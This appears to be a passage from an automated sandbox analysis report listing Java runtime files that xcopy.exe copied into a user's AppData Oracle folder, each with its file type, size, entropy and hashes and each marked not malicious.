SHA1:	8EE70535BB51179B32ECFCB251BF6AD93F37B0EB
SHA-256:	CBDF68A18575354F452621FB05B973C12ACAA0A9728EE7094FB2977A017740FF
SHA-512:	0558C4B72C039DF9289DC9688D21ABBA2E8243518F58A7314DBBF23C2A2B4345C77195AB36E17DBF83C6268725C5A2E860A69F329558B2096C9C6985A936DCA0
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\ext\dnsns.jar
Process:	C:\Windows\System32\xcopy.exe
File Type:	Java Jar file data (zip)
Size (bytes):	8286
Entropy (8bit):	7.789722834406651
Encrypted:	false
MD5:	010850B4AA1CA2C192CE702680624899
SHA1:	180CCBF76FF1A38B7EBCFC0BD50C1350E6BE5848
SHA-256:	C18ACE3882EA378BA8249EC0130E903EB3C5D22383665D840F02A6B5853DB7D6
SHA-512:	775E9AD56700E3D8BFF00490CD8307D6C9C107C87250624A45FDEA9AB21A9CAD020BB1D30214EDABEC50B6773FF12319F9982E22A6F97567C3BF36C9BA6F876A
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\ext\jaccess.jar
Process:	C:\Windows\System32\xcopy.exe
File Type:	Java Jar file data (zip)
Size (bytes):	44115
Entropy (8bit):	7.9123922232085375
Encrypted:	false
MD5:	A471401C2DC7004F19C9480EAB1F5342
SHA1:	36506B08B8C157020F0857B5E960E9F57D1CD01B
SHA-256:	BD0FC91B2F8B54CD18C80ECA1F1D5FA89D2570DC8733B04989F2FA53477046A3
SHA-512:	F7F05066ED3E435343427A82437B015DD36DB69B2E57A1C585544DAE71B8D06B741D4CFA06F37CAB2B387D91B36D759A6164C3B3A001E828C2AD797EE2BA273E
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\ext\jfxrt.jar
Process:	C:\Windows\System32\xcopy.exe
File Type:	Java Jar file data (zip)
Size (bytes):	16588697
Entropy (8bit):	6.023182903194953
Encrypted:	false
MD5:	233C336D057EACF0B3024743291A5F31
SHA1:	98B521B98BA5C73A39A3EB3FD2FDBF4D7FFB21CC
SHA-256:	B4786E2C5C4C832878ED7B526927E339BC1F02C98C18C34370F29E383037EFCA
SHA-512:	CEBA1DF8E5677FD36072D1C1D95B8388CF1BE9C4481396B3CA8A00E46F97C981DB62053CE592A88B7EDDC2BC204E071C7AA8402524738AF32D830999386776D7
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\ext\localedata.jar
Process:	C:\Windows\System32\xcopy.exe
File Type:	Java Jar file data (zip)
Size (bytes):	2206685
Entropy (8bit):	6.726779072231083
Encrypted:	false
MD5:	0D14084BFE6F9F68799F11D02E8D2CA9
SHA1:	381307DD45AE6D5DE62D49041238C559C121682C
SHA-256:	414D2A6D6ABD2D3ED746EE2B1001A8EBA01CA957B35BFEED78117F9FE82C7390
SHA-512:	D98D5B215B8A62FB68853673E9FFF922D51911DE5B71BDBC44D5D29C89DF10D2D5551A2E1A4C73BED9E53574F9169195A5F7E03300720621E96699FBA565D7C6
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\ext\meta-index
Process:	C:\Windows\System32\xcopy.exe
File Type:	ASCII text, with CRLF line terminators
Size (bytes):	1511
Entropy (8bit):	5.142622776492156
Encrypted:	false
MD5:	77ABE2551C7A5931B70F78962AC5A3C7
SHA1:	A8BB53A505D7002DEF70C7A8788B9A2EA8A1D7BC
SHA-256:	C557F0C9053301703798E01DC0F65E290B0AE69075FB49FCC0E68C14B21D87F4
SHA-512:	9FE671380335804D4416E26C1E00CDED200687DB484F770EBBDB8631A9C769F0A449C661CB38F49C41463E822BEB5248E69FD63562C3D8C508154C5D64421935
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\ext\nashorn.jar
Process:	C:\Windows\System32\xcopy.exe
File Type:	Java Jar file data (zip)
Size (bytes):	2008813
Entropy (8bit):	7.9334908451612
Encrypted:	false
MD5:	1737CA1ED326BC1A2F65D00CFF35F81B
SHA1:	BF0C9EA9D8A4C81FE9776F7FA64DE2046B47FF73
SHA-256:	62C7B89EA2B135E34864627B9CFBBB774B23AC22A13E8826E3CEDFBF2C362F79
SHA-512:	C3F676CAD64A18B0E8216DA4D8F8B439C948BA51E5D7F8E28AA963DA3EEBBBA77B534C47A82C2C822A3F656F4079383F97F1D944E0F00ED6A1D98A4BE563B0F6
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\ext\sunec.jar
Process:	C:\Windows\System32\xcopy.exe
File Type:	Zip archive data, at least v2.0 to extract
Size (bytes):	39773
Entropy (8bit):	7.927497368287598
Encrypted:	false
MD5:	65E841CBFF7777C462C064A105CD6693
SHA1:	2A168E4DD5F0385CCDE79CE9EDF6643E6D1CBC97
SHA-256:	869EA30322A9DB85878A15FC0120DFD486D10DF1D8FB3ADEDA0EC3863B08DCE5
SHA-512:	115EF69F0D7D39F74828CD66719E441310D98D98D69FF9071BD7377BAFAF392F01139DCEC314C0833F815084950072DEF3AD61D9884AF55CCAE487F42259175F
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\ext\sunjce_provider.jar
Process:	C:\Windows\System32\xcopy.exe
File Type:	Zip archive data, at least v2.0 to extract
Size (bytes):	278033
Entropy (8bit):	7.9019426340644054
Encrypted:	false
MD5:	7B66C8DBEA43BBFEF0CEA5BC001BBE7C
SHA1:	B5FDBBFE2AA789F17EDBBB930DFCEAFF5AC03C7F
SHA-256:	1B2F1E5353951B082E2AD4D29971645F0FA9C021A98927B45D2D62EE3CF5F94D
SHA-512:	2F71714672B8231013F895EA1D070FEBEB6EAAFECB1E7AA46F6B51EA96A40875AEB932B2F705215C3A489DC394492D85374B419D249A73039DCDCF83AB274806
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\ext\sunmscapi.jar
Process:	C:\Windows\System32\xcopy.exe
File Type:	Zip archive data, at least v2.0 to extract
Size (bytes):	32654
Entropy (8bit):	7.8738733146294955
Encrypted:	false
MD5:	352D3349BC9293814990A1579062C575
SHA1:	4C517B0332501940A54306743C233C6E5E15D2B2
SHA-256:	1F910115E8E774FF59252124E293BC24BA6A2FCEE50FB888054493EFCCCDCAEA
SHA-512:	7A29241099147202E65E45FFCC295910ED94B7D190FF46F0C09C6E151C010627EB1B560BD6055E0B8422A0014AA52CC8F4ED13375D618A27A03956227D327C67
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\ext\sunpkcs11.jar
Process:	C:\Windows\System32\xcopy.exe
File Type:	Zip archive data, at least v2.0 to extract
Size (bytes):	249387
Entropy (8bit):	7.951476003829524
Encrypted:	false
MD5:	4FAD19CDFD32D9F58E03D45DF2939601
SHA1:	A3F1050C75D139479EB4FC100936FC08A9385BD1
SHA-256:	96D9AAB3F041ECD20694601D5F0B236D05D1845DF40B03B692328A030101C64C
SHA-512:	593E86E7C0F53A322AD3A21A1B06B6A6CD006265ECA9358CC92432D683D1F6165F39D0E21D5E06E58DF1E9458F1F561E7D93AD117F9E461BB1A74272E30BA20B
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\ext\zipfs.jar
Process:	C:\Windows\System32\xcopy.exe
File Type:	Java Jar file data (zip)
Size (bytes):	68836
Entropy (8bit):	7.9509903209410515
Encrypted:	false
MD5:	7E6B85454069F4B0F9E2D2151079FAD5
SHA1:	5AD979A141C0FFAFAB1200DB2A68F149EC94F3C1
SHA-256:	7B095A4C0531FA2860D9A33AD8E0875FD1538B4DB46BC07FFDB7DBFEF1BF5DD3
SHA-512:	EE88354462F028F0FEC12F5E8379E116B9CEA0B83E714DCA2B062A3A86B7336D532FDE289A193F2D366E6BD9F9EAB465B509B2487C6E34EF06FBFE1F2BD5CCD8
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\flavormap.properties
Process:	C:\Windows\System32\xcopy.exe
File Type:	ASCII text
Size (bytes):	3928
Entropy (8bit):	4.866168914342862
Encrypted:	false
MD5:	D8B47B11E300EF3E8BE3E6E50AC6910B
SHA1:	2D5ED3B53072B184D67B1A4E26AEC2DF908DDC55
SHA-256:	C2748E07B59398CC40CACCCD47FC98A70C562F84067E9272383B45A8DF72A692
SHA-512:	8C5F3E1619E8A92B9D9CF5932392B1CB9F77625316B9EEF447E4DCE54836D90951D9EE70FFD765482414DD51B816649F846E40FD07B4FBDD5080C056ADBBAE6F
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\fontconfig.bfc
Process:	C:\Windows\System32\xcopy.exe
File Type:	raw G3 data
Size (bytes):	3670
Entropy (8bit):	4.405705126348569
Encrypted:	false
MD5:	E0E5428560288E685DBFFC0D2776D4A6
SHA1:	2AE70624762C163C8A1533F724AA5A511D8B208E
SHA-256:	AAE23ACC42F217A63D675F930D077939765B97E9C528B5659842515CA975111F
SHA-512:	C726CC2898399579AFA70ACACE86BEC4369D4541112243E51721568B4D25DCC6C66FA64AC475AFF9BA9DE07A630B24A9F221FA00426AD36845203BA809219E3C
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\fontconfig.properties.src
Process:	C:\Windows\System32\xcopy.exe
File Type:	ASCII text
Size (bytes):	10479
Entropy (8bit):	5.177722302518697
Encrypted:	false
MD5:	1C2FFEA868138A14FCF8FFCC375A0AB1
SHA1:	D1B1A3C3658FA5C42B8090B60D379A3F0D3EA934
SHA-256:	2F3067FB80574523307836E50990F575AA50ACA3BC4FED9BCBDEA291D36012A2
SHA-512:	5D8116A78974C395C44FC8BC377E2A33914BB218BC6BA1E546279639C071793A420BF95BA39B0B18C9AC4865438EEDFAA4C7A81A31673D234306A858C5D7679B
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\fonts\LucidaBrightDemiBold.ttf
Process:	C:\Windows\System32\xcopy.exe
File Type:	TrueType font data
Size (bytes):	75144
Entropy (8bit):	6.8494205410017335
Encrypted:	false
MD5:	AF0C5C24EF340AEA5CCAC002177E5C09
SHA1:	B5C97F985639E19A3B712193EE48B55DDA581FD1
SHA-256:	72CEE3E6DF72AD577AF49C59DCA2D0541060F95A881845950595E5614C486244
SHA-512:	6CE87441E223543394B7242AC0CB63505888B503EC071BBF7DB857B5C935B855719B818090305E17C1197DE882CCC90612FB1E0A0E5D2731F264C663EB8DA3F9
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\fonts\LucidaBrightDemiItalic.ttf
Process:	C:\Windows\System32\xcopy.exe
File Type:	TrueType font data
Size (bytes):	75124
Entropy (8bit):	6.805969666701277
Encrypted:	false
MD5:	793AE1AB32085C8DE36541BB6B30DA7C
SHA1:	1FD1F757FEBF3E5F5FBB7FBF7A56587A40D57DE7
SHA-256:	895C5262CDB6297C13725515F849ED70609DBD7C49974A382E8BBFE4A3D75F8C
SHA-512:	A92ADDD0163F6D81C3AEABD63FF5C293E71A323F4AEDFB404F6F1CDE7F84C2A995A30DFEC84A9CAF8FFAF8E274EDD0D7822E6AABB2B0608696A360CABFC866C6
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\fonts\LucidaBrightItalic.ttf
Process:	C:\Windows\System32\xcopy.exe
File Type:	TrueType font data
Size (bytes):	80856
Entropy (8bit):	6.821405620058843
Encrypted:	false
MD5:	4D666869C97CDB9E1381A393FFE50A3A
SHA1:	AA5C037865C563726ECD63D61CA26443589BE425
SHA-256:	D68819A70B60FF68CA945EF5AD358C31829E43EC25024A99D17174C626575E06
SHA-512:	1D1F61E371E4A667C90C2CE315024AE6168E47FE8A5C02244DBF3DF26E8AC79F2355AC7E36D4A81D82C52149197892DAED1B4C19241575256BB4541F8B126AE2
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\fonts\LucidaBrightRegular.ttf
Process:	C:\Windows\System32\xcopy.exe
File Type:	TrueType font data
Size (bytes):	344908
Entropy (8bit):	6.939775499317556
Encrypted:	false
MD5:	630A6FA16C414F3DE6110E46717AAD53
SHA1:	5D7ED564791C900A8786936930BA99385653139C
SHA-256:	0FAAACA3C730857D3E50FBA1BBAD4CA2330ADD217B35E22B7E67F02809FAC923
SHA-512:	0B7CDE0FACE982B5867AEBFB92918404ADAC7FB351A9D47DCD9FE86C441CACA4DD4EC22E36B61025092220C0A8730D292DA31E9CAFD7808C56CDBF34ECD05035
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\fonts\LucidaSansDemiBold.ttf
Process:	C:\Windows\System32\xcopy.exe
File Type:	TrueType font data
Size (bytes):	317896
Entropy (8bit):	6.8695984804687455
Encrypted:	false
MD5:	5DD099908B722236AA0C0047C56E5AF2
SHA1:	92B79FEFC35E96190250C602A8FED85276B32A95
SHA-256:	53773357D739F89BC10087AB2A829BA057649784A9ACBFFEE18A488B2DCCB9EE
SHA-512:	440534EB2076004BEA66CF9AC2CE2B37C10FBF5CC5E0DD8B8A8EDEA25E3613CE8A59FFCB2500F60528BBF871FF37F1D0A3C60396BC740CCDB4324177C38BE97A
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\fonts\LucidaSansRegular.ttf
Process:	C:\Windows\System32\xcopy.exe
File Type:	TrueType font data
Size (bytes):	698236
Entropy (8bit):	6.892888039120646
Encrypted:	false
MD5:	B75309B925371B38997DF1B25C1EA508
SHA1:	39CC8BCB8D4A71D4657FC92EF0B9F4E3E9E67ADD
SHA-256:	F8D877B0B64600E736DFE436753E8E11ACB022E59B5D7723D7D221D81DC2FCDE
SHA-512:	9C792EF3116833C90103F27CFD26A175AB1EB11286959F77062893A2E15DE44D79B27E5C47694CBBA734CC05A9A5BEFA72E991C7D60EAB1495AAC14C5CAD901D
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\fonts\LucidaTypewriterBold.ttf
Process:	C:\Windows\System32\xcopy.exe
File Type:	TrueType font data
Size (bytes):	234068
Entropy (8bit):	6.901545053424004
Encrypted:	false
MD5:	A0C96AA334F1AEAA799773DB3E6CBA9C
SHA1:	A5DA2EB49448F461470387C939F0E69119310E0B
SHA-256:	FC908259013B90F1CBC597A510C6DD7855BF9E7830ABE3FC3612AB4092EDCDE2
SHA-512:	A43CF773A42B4CEBF4170A6C94060EA2602D2D7FA7F6500F69758A20DC5CC3ED1793C7CEB9B44CE8640721CA919D2EF7F9568C5AF58BA6E3CF88EAE19A95E796
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\fonts\LucidaTypewriterRegular.ttf
Process:	C:\Windows\System32\xcopy.exe
File Type:	TrueType font data
Size (bytes):	242700
Entropy (8bit):	6.936925430880876
Encrypted:	false
MD5:	C1397E8D6E6ABCD727C71FCA2132E218
SHA1:	C144DCAFE4FAF2E79CFD74D8134A631F30234DB1
SHA-256:	D9D0AAB0354C3856DF81AFAC49BDC586E930A77428CB499007DDE99ED31152FF
SHA-512:	DA70826793C7023E61F272D37E2CC2983449F26926746605C550E9D614ACBF618F73D03D0C6351B9537703B05007CD822E42E6DC74423CB5CC736B31458D33B1
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\hijrah-config-umalqura.properties
Process:	C:\Windows\System32\xcopy.exe
File Type:	ASCII text
Size (bytes):	13962
Entropy (8bit):	3.4283479014478493
Encrypted:	false
MD5:	1EDDFB1EE252055556F40CDC79632E98
SHA1:	84AA425100740722E91F4725CAF849E7863D12BA
SHA-256:	69BECFE0D45B62BBDBCF6FE111A8A3A041FB749B6CF38E8A2F670607E17C9EE2
SHA-512:	A0FDBF42FF105C9A2F12179124606A720DF8F32365605644E15600767E5732312777A58390FDB1A9B1C0B152CCC29496133B278A6E5736B38AF2B5FAB251D40C
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\i386\jvm.cfg
Process:	C:\Windows\System32\xcopy.exe
File Type:	ASCII text
Size (bytes):	623
Entropy (8bit):	4.956046853743129
Encrypted:	false
MD5:	9AEF14A90600CD453C4E472BA83C441F
SHA1:	10C53C9FE9970D41A84CB45C883EA6C386482199
SHA-256:	9E86B24FF2B19D814BBAEDD92DF9F0E1AE86BF11A86A92989C9F91F959B736E1
SHA-512:	481562547BF9E37D270D9A2881AC9C86FC8F928B5C176E9BAF6B8F7B72FB9827C84EF0C84B60894656A6E82DD141779B8D283C6E7A0E85D2829EA071C6DB7D14
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\images\cursors\cursors.properties
Process:	C:\Windows\System32\xcopy.exe
File Type:	ASCII text
Size (bytes):	1280
Entropy (8bit):	4.9763389414972465
Encrypted:	false
MD5:	269D03935907969C3F11D43FEF252EF1
SHA1:	713ACB9EFF5F0B14A109E6C2771F62EAC9B57D7C
SHA-256:	7B8B63F78E2F732BD58BF8F16144C4802C513A52970C18DC0BDB789DD04078E4
SHA-512:	94D8EE79847CD07681645D379FEEF6A4005F1836AC00453FB685422D58113F641E60053F611802B0FF8F595B2186B824675A91BF3E68D336EF5BD72FAFB2DCC5
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\images\cursors\invalid32x32.gif
Process:	C:\Windows\System32\xcopy.exe
File Type:	GIF image data, version 89a, 32 x 32
Size (bytes):	153
Entropy (8bit):	6.281310631983366
Encrypted:	false
MD5:	1E9D8F133A442DA6B0C74D49BC84A341
SHA1:	259EDC45B4569427E8319895A444F4295D54348F
SHA-256:	1A1D3079D49583837662B84E11D8C0870698511D9110E710EB8E7EB20DF7AE3B
SHA-512:	63D6F70C8CAB9735F0F857F5BF99E319F6AE98238DC7829DD706B7D6855C70BE206E32E3E55DF884402483CF8BEBAD00D139283AF5C0B85DC1C5BF8F253ACD37
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\images\cursors\win32_CopyDrop32x32.gif
Process:	C:\Windows\System32\xcopy.exe
File Type:	GIF image data, version 89a, 31 x 32
Size (bytes):	165
Entropy (8bit):	6.347455736310775
Encrypted:	false
MD5:	89CDF623E11AAF0407328FD3ADA32C07
SHA1:	AE813939F9A52E7B59927F531CE8757636FF8082
SHA-256:	13C783ACD580DF27207DABCCB10B3F0C14674560A23943AC7233DF7F72D4E49D
SHA-512:	2A35311D7DB5466697D7284DE75BABEE9BD0F0E2B20543332FCB6813F06DEBF2457A9C0CF569449C37F371BFEB0D81FB0D219E82B9A77ACC6BAFA07499EAC2F7
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\images\cursors\win32_CopyNoDrop32x32.gif
Process:	C:\Windows\System32\xcopy.exe
File Type:	GIF image data, version 89a, 32 x 32
Size (bytes):	153
Entropy (8bit):	6.281310631983366
Encrypted:	false
MD5:	1E9D8F133A442DA6B0C74D49BC84A341
SHA1:	259EDC45B4569427E8319895A444F4295D54348F
SHA-256:	1A1D3079D49583837662B84E11D8C0870698511D9110E710EB8E7EB20DF7AE3B
SHA-512:	63D6F70C8CAB9735F0F857F5BF99E319F6AE98238DC7829DD706B7D6855C70BE206E32E3E55DF884402483CF8BEBAD00D139283AF5C0B85DC1C5BF8F253ACD37
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\images\cursors\win32_LinkDrop32x32.gif
Process:	C:\Windows\System32\xcopy.exe
File Type:	GIF image data, version 89a, 31 x 32
Size (bytes):	168
Entropy (8bit):	6.465243369905675
Encrypted:	false
MD5:	694A59EFDE0648F49FA448A46C4D8948
SHA1:	4B3843CBD4F112A90D112A37957684C843D68E83
SHA-256:	485CBE5C5144CFCD13CC6D701CDAB96E4A6F8660CBC70A0A58F1B7916BE64198
SHA-512:	CF2DFD500AF64B63CC080151BC5B9DE59EDB99F0E31676056CF1AFBC9D6E2E5AF18DC40E393E043BBBBCB26F42D425AF71CCE6D283E838E67E61D826ED6ECD27
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\images\cursors\win32_LinkNoDrop32x32.gif
Process:	C:\Windows\System32\xcopy.exe
File Type:	GIF image data, version 89a, 32 x 32
Size (bytes):	153
Entropy (8bit):	6.281310631983366
Encrypted:	false
MD5:	1E9D8F133A442DA6B0C74D49BC84A341
SHA1:	259EDC45B4569427E8319895A444F4295D54348F
SHA-256:	1A1D3079D49583837662B84E11D8C0870698511D9110E710EB8E7EB20DF7AE3B
SHA-512:	63D6F70C8CAB9735F0F857F5BF99E319F6AE98238DC7829DD706B7D6855C70BE206E32E3E55DF884402483CF8BEBAD00D139283AF5C0B85DC1C5BF8F253ACD37
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\images\cursors\win32_MoveDrop32x32.gif
Process:	C:\Windows\System32\xcopy.exe
File Type:	GIF image data, version 89a, 31 x 32
Size (bytes):	147
Entropy (8bit):	6.147949937659802
Encrypted:	false
MD5:	CC8DD9AB7DDF6EFA2F3B8BCFA31115C0
SHA1:	1333F489AC0506D7DC98656A515FEEB6E87E27F9
SHA-256:	12CFCE05229DBA939CE13375D65CA7D303CE87851AE15539C02F11D1DC824338
SHA-512:	9857B329ACD0DB45EA8C16E945B4CFA6DF9445A1EF457E4B8B40740720E8C658301FC3AB8BDD242B7697A65AE1436FD444F1968BD29DA6A89725CDDE1DE387B8
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\images\cursors\win32_MoveNoDrop32x32.gif
Process:	C:\Windows\System32\xcopy.exe
File Type:	GIF image data, version 89a, 32 x 32
Size (bytes):	153
Entropy (8bit):	6.281310631983366
Encrypted:	false
MD5:	1E9D8F133A442DA6B0C74D49BC84A341
SHA1:	259EDC45B4569427E8319895A444F4295D54348F
SHA-256:	1A1D3079D49583837662B84E11D8C0870698511D9110E710EB8E7EB20DF7AE3B
SHA-512:	63D6F70C8CAB9735F0F857F5BF99E319F6AE98238DC7829DD706B7D6855C70BE206E32E3E55DF884402483CF8BEBAD00D139283AF5C0B85DC1C5BF8F253ACD37
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\javafx.properties
Process:	C:\Windows\System32\xcopy.exe
File Type:	ASCII text
Size (bytes):	30
Entropy (8bit):	4.173557262275185
Encrypted:	false
MD5:	170F96ADF03A5BB5C4491EF32C990C76
SHA1:	92914B23AF8198FF38C8D2B40193762E69AEB64A
SHA-256:	CEC6871EFA375D6A812ED453E91B7479D192644BF5B0A2F484D3909F3296DCEA
SHA-512:	25438C34E2935F0937AA6928B63DFC5C3CC6425104029D66BDACCBBB47805BA30C0EB2E688B473E2AD322272962E666F30C0891B9A4B9CEA822FFC6B0B095AC2
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\javaws.jar
Process:	C:\Windows\System32\xcopy.exe
File Type:	Java Jar file data (zip)
Size (bytes):	922163
Entropy (8bit):	5.944732715739307
Encrypted:	false
MD5:	3CE4ED4B3BB19EF4FAFD5F6584D6BCDC
SHA1:	4747660B5B57AEFC7B38E64641F9DD5DE1AD2936
SHA-256:	F17AF9A7A8A1F81A91AD866126B6D70DE7B2C95F388E724B9620D88C4325485D
SHA-512:	8BBCB402B48E0D6FFBB38E65DC1110AB6A88F2591EC19A928E1403F301A6EBF501FEFDFD82D2BBE775B89E27382408E16CFEFC0E2134F6DB5A6FF35CD902552A
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\jce.jar
Process:	C:\Windows\System32\xcopy.exe
File Type:	Zip archive data, at least v2.0 to extract
Size (bytes):	114708
Entropy (8bit):	7.912598995755304
Encrypted:	false
MD5:	16D24DA96B20188099C93F6322486A08
SHA1:	8ABEB866DD408E58086D17F98E6F32B9A9C5051E
SHA-256:	7B6E1CD976BF6CB6B3D65D355AC41D80F2FBE4C1E825B1C25D073DDACC88AFFD
SHA-512:	637A0A8A1FA55B44A79E7AFB5923B8B67FFBF7E92A81A456AC8F3A32C75DD0F83E45033EE71AB5FC64ACD2BA5964158A92340285A447E4C10F7CBBD79BC2194F
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\jfr.jar
Process:	C:\Windows\System32\xcopy.exe
File Type:	Java Jar file data (zip)
Size (bytes):	555272
Entropy (8bit):	5.783032241011611
Encrypted:	false
MD5:	3898D77811132A87D06CABDFCE6D78A4
SHA1:	A7C87B50854D4DFE640F3142EE26197D9B603CC8
SHA-256:	085EEEE18A144F058FD83B305CB484171C9F7F9BC7DEDCE342F5EFC541B1D03F
SHA-512:	01B02BE66C371C7A2232C51A32B05A26F409F5614DDDA936D44AE5D3629857CA1ABE10D4BC2D44C390AF8DD9697D260409ABD827E0BCBDB8F4B57F28D736932A
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\jfr\default.jfc
Process:	C:\Windows\System32\xcopy.exe
File Type:	XML document text
Size (bytes):	19918
Entropy (8bit):	4.57152189184002
Encrypted:	false
MD5:	971683E69CA9CC831AFEC282E999517C
SHA1:	B054DE4C4A6F6E04800942C3FCDF2E99963D91FA
SHA-256:	0E90E5023F69C44497F1886BC11FCDC8CAF8E5BDB0FBD86AC653327A61E51451
SHA-512:	99DB3A71C96D959B8BC5E5896C834BE43F37AD1EFF5F7D915183521289563AB7E103DD7D00028C73CB05BAE1C0D53441AA0C1D47B2034CD9E08AAD7F2D2BA247
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\jfr\profile.jfc
Process:	C:\Windows\System32\xcopy.exe
File Type:	XML document text
Size (bytes):	19874
Entropy (8bit):	4.571193493689933
Encrypted:	false
MD5:	0876BCEDFD8E60815378359F5A428F3E
SHA1:	EEE5A1D7F47CCE948AF54821F0C5DBC9FCA28925
SHA-256:	0F459267C79FEC84D7C01F1BC7085821248D91D16324AF7EEF04274A243BED38
SHA-512:	132A5B8E78BD2D047F1A09654C63C4D59B892546270E1D99694E4CEF5A7B064A34CA3DACF6BB8028354205C348153820C48D79D2E9A42BBAD5A90EB252976C45
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\jfxswt.jar
Process:	C:\Windows\System32\xcopy.exe
File Type:	Java Jar file data (zip)
Size (bytes):	33795
Entropy (8bit):	7.929553369672167
Encrypted:	false
MD5:	BB8A691F941897A5FA57BCB8CF9C5ACA
SHA1:	5974DC9E30A12EC134BC8B3557B395F5079810AC
SHA-256:	C9E614ABC007E61CA322F291435A0BED63CAECD71407D85EF6FDB38A0D3BFBD2
SHA-512:	73D59B29601D50866E29F7D84C109FC114E430F69ECE0A062CEA83F2E92DFFD5FC947EE3EBF37A05788831A783DBA6E4F7EC13B148BFF27957AF7D9D96EAE4D6
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\jsse.jar
Process:	C:\Windows\System32\xcopy.exe
File Type:	Java Jar file data (zip)
Size (bytes):	560798
Entropy (8bit):	6.058167604931417
Encrypted:	false
MD5:	4968B980CF80BF734B4189F71E885A4D
SHA1:	BAC4F583C89D787E65D3B1CF6145316792AB121D
SHA-256:	26DD169CECCC3A1F5E255AEBAFDCFF1399B21AF498116AC568CAAACD92C16DDF
SHA-512:	4967F2CC2DA3E8CF7A1B90D39F285D8E3AC1D30C2F56B350F0FCF95DA42EB414C285390D062FE0716AEDAA2ACC34A1DEA0380382602A97D5C04720BCBEBB199D
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\jvm.hprof.txt
Process:	C:\Windows\System32\xcopy.exe
File Type:	ASCII text
Size (bytes):	4226
Entropy (8bit):	4.708892688554675
Encrypted:	false
MD5:	C677FF69E70DC36A67C72A3D7EF84D28
SHA1:	FBD61D52534CDD0C15DF332114D469C65D001E33
SHA-256:	B055BF25B07E5AC70E99B897FB8152F288769065B5B84387362BB9CC2E6C9D38
SHA-512:	32D82DAEDBCA1988282A3BF67012970D0EE29B16A7E52C1242234D88E0F3ED8AF9FC9D6699924D19D066FD89A2100E4E8898AAC67675D4CD9831B19B975ED568
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\logging.properties
Process:	C:\Windows\System32\xcopy.exe
File Type:	ASCII text
Size (bytes):	2455
Entropy (8bit):	4.470261330379311
Encrypted:	false
MD5:	809C50033F825EFF7FC70419AAF30317
SHA1:	89DA8094484891F9EC1FA40C6C8B61F94C5869D0
SHA-256:	CE1688FE641099954572EA856953035B5188E2CA228705001368250337B9B232
SHA-512:	C5AA71AD9E1D17472644EB43146EDF87CAA7BCCF0A39E102E31E6C081CD017E01B39645F55EE87F4EA3556376F7CAD3953CE3F3301B4B3AF265B7B4357B67A5C
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\management-agent.jar
Process:	C:\Windows\System32\xcopy.exe
File Type:	Java Jar file data (zip)
Size (bytes):	381
Entropy (8bit):	4.934189200955851
Encrypted:	false
MD5:	FCB5C0082CF6B0231811B1719F9EA7D6
SHA1:	08521B97E6A2B7CD85894F63018CF61521F498A9
SHA-256:	C80447F56C74DE89077B7616A56836349605C41933900A27EB52E012A56F9A32
SHA-512:	D4430BF469BCEC9276AE97C09857AF13522418945186607229A355B1B2A6E972B37D782762D7BF4DF1042E5F41A12989F8F7672900C0594BBB150B42712A33DB
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\management\jmxremote.access
Process:	C:\Windows\System32\xcopy.exe
File Type:	ASCII text
Size (bytes):	3998
Entropy (8bit):	4.42020571745971
Encrypted:	false
MD5:	F63BEA1F4A31317F6F061D83215594DF
SHA1:	21200EAAD898BA4A2A8834A032EFB6616FABB930
SHA-256:	439158EB513525FEDA19E0E4153CCF36A08FE6A39C0C6CEEB9FCEE86899DD33C
SHA-512:	DE49913B8FA2593DC71FF8DAC85214A86DE891BEDEE0E4C5A70FCDD34E605F8C5C8483E2F1BDB06E1001F7A8CF3C86CAD9FA575DE1A4DC466E0C8FF5891A2773
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\management\jmxremote.password.template
Process:	C:\Windows\System32\xcopy.exe
File Type:	ASCII text
Size (bytes):	2856
Entropy (8bit):	4.4922650877925445
Encrypted:	false
MD5:	7B46C291E7073C31D3CE0ADAE2F7554F
SHA1:	C1E0F01408BF20FBBB8B4810520C725F70050DB5
SHA-256:	3D83E336C9A24D09A16063EA1355885E07F7A176A37543463596B5DB8D82F8FA
